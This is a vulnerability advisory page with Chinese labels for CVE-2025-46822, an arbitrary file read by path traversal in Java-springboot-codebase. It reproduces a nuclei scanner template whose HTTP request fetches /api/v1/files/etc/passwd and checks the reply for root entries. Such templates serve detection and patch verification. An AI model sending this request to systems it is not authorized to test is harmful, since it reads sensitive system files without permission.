CVE-2025-46822: Java-springboot-codebase 1.1 - Arbitrary File Read

日期: 2025-08-01 | 影响软件: Java springboot codebase | POC: 已公开

漏洞描述

OsamaTaher/Java-springboot-codebase is a collection of Java and Spring Boot code snippets, applications, and projects. Prior to commit c835c6f7799eacada4c0fc77e0816f250af01ad2, insufficient path traversal mechanisms make absolute path traversal possible. This vulnerability allows unauthorized access to sensitive internal files. Commit c835c6f7799eacada4c0fc77e0816f250af01ad2 contains a patch for the issue.

PoC代码[已公开]

id: CVE-2025-46822

info:
  name: Java-springboot-codebase 1.1 - Arbitrary File Read
  author: haliteroglu25
  severity: high
  description: |
    OsamaTaher/Java-springboot-codebase is a collection of Java and Spring Boot code snippets, applications, and projects. Prior to commit c835c6f7799eacada4c0fc77e0816f250af01ad2, insufficient path traversal mechanisms make absolute path traversal possible. This vulnerability allows unauthorized access to sensitive internal files. Commit c835c6f7799eacada4c0fc77e0816f250af01ad2 contains a patch for the issue.
  reference:
    - https://github.com/OsamaTaher/Java-springboot-codebase
    - https://nvd.nist.gov/vuln/detail/CVE-2025-46822
    - https://github.com/OsamaTaher/Java-springboot-codebase/security/advisories/GHSA-q6mm-cm37-w637
    - https://github.com/OsamaTaher/Java-springboot-codebase/commit/c835c6f7799eacada4c0fc77e0816f250af01ad2
    - https://github.com/PuddinCat/GithubRepoSpider
  classification:
    epss-score: 0.11483
    epss-percentile: 0.93309
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,java,springboot,codebase,lfi,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "Whitelabel Error Page","explicit mapping")'
        internal: true

  - raw:
      - |
        GET /api/v1/files/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c277e11533a66c27df6d39dea7865a0fceb46a55518959a5ebd7f54235a0e29f022100ee2b8f00a4172120e85179c0bf6c45a112afe1f9d08a921a971976f3a54ab3dd:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-46822.yaml